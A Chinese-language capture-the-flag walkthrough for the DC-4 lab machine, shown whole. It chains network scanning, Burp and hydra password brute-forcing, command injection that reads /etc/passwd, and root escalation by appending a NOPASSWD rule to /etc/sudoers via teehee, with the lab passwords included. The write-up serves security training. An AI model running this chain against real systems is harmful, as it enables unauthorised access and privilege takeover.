DC系列靶机4通关教程

DC-4

信息收集

扫描主机

arp-scan -l
1

端口扫描

nmap -p- -A 192.168.16.165
1

发现ssh端口和80端口都打开着呢

目录扫描

dirsearch -u http://192.168.16.165

dirb hhtp://192.168.16.165
1
2
3

登录web网页

发现没有可用信息，发现页面提示admin

爆破

用户密码爆破

使用用户名admin，密码随意，点击登录，使用bp进行密码爆破

爆破出密码为happy

登录网页

点击command，点击run发现执行了ls -l命令

命令执行漏洞利用

使用bp抓包，点击run，右键发送重发器，发现数据包是post提交数据

将radio更改为id查看用户权限，发现是普通用户。

id
1

查看有没有其他用户

cat /etc/passwd
1

发现有三个普通用户：charles、jim、sam和root用户

扫描三个用户的家目录，发现只有jim的加目录中有数据

ls -lh /home/charles
ls -lh /home/jim
ls -lh /home/sam
1
2
3

访问jim目录下backups，发现有一个旧密码本

ls -lh /home/jim/backups
1

查看旧密码本

cat /home/jim/backups/old-passwords.bak
1

将密码复制到pswd.txt文档中

扫描端口时发现有ssh端口开放，尝试使用hydra爆破端口

hydra -l jim -P pswd.txt ssh://192.168.16.165
1

使用ssh登录jim账号，发现有邮件

ssh jim@192.168.16.165
1

密码：jibril04

查看当前文件夹，查看文件mbox

ls -l
cat mbox
1
2

查看邮件，Linux中邮件存放在/var/spool/mail中

cd /var/spool/mail
ls
cat jim
1
2
3

邮件内容提到Charles的密码为^xHhA&hvim0y可以切换Charles查看

su Charles
1

使用命令发现权限不够

提权

查看所有可以使用root用户身份使用的命令

sudo -l
1

发现teehee可以使用root身份使用

echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers
1

这个命令的作用是将一行文本添加到 /etc/sudoers 文件中，允许用户 charles 在执行 sudo 命令时无需输入密码。下面是对该命令的详细解析：

• echo ‘charles ALL=(ALL:ALL) NOPASSWD:ALL’: echo 命令用于向标准输出打印文本。此处的文本是 ‘charles ALL=(ALL:ALL) NOPASSWD:ALL’，它定义了一个 sudo 权限规则。

  • charles: 这是用户名，在这个例子中是指定的用
  • ALL=(ALL:ALL): 这部分规定了 charles 用户可以以任何用户身份和组执行任何命令。
  • NOPASSWD:ALL: 这部分规定了 charles 用户在执行 sudo 命令时无需输入密码。

• |: 这是管道符号，用于将 echo 命令的输出传递给下一个命令。

• sudo teehee -a /etc/sudoers：sudo 是一个授权用户执行特权命令的工具。teehee 命令用于从标准输入读取数据，并将其写入文件。-a 参数表示追加写入。

  • /etc/sudoers: 这是一个特殊的文件，用于配置 sudo 的权限规则。只有具有适当权限的用户才能修改此文件。

用是，利用 echo 打印出 sudo 权限规则的文本，并将其追加写入 /etc/sudoers 文件中。这样就允许了用户 charles 在执行 sudo 命令时无需输入密码。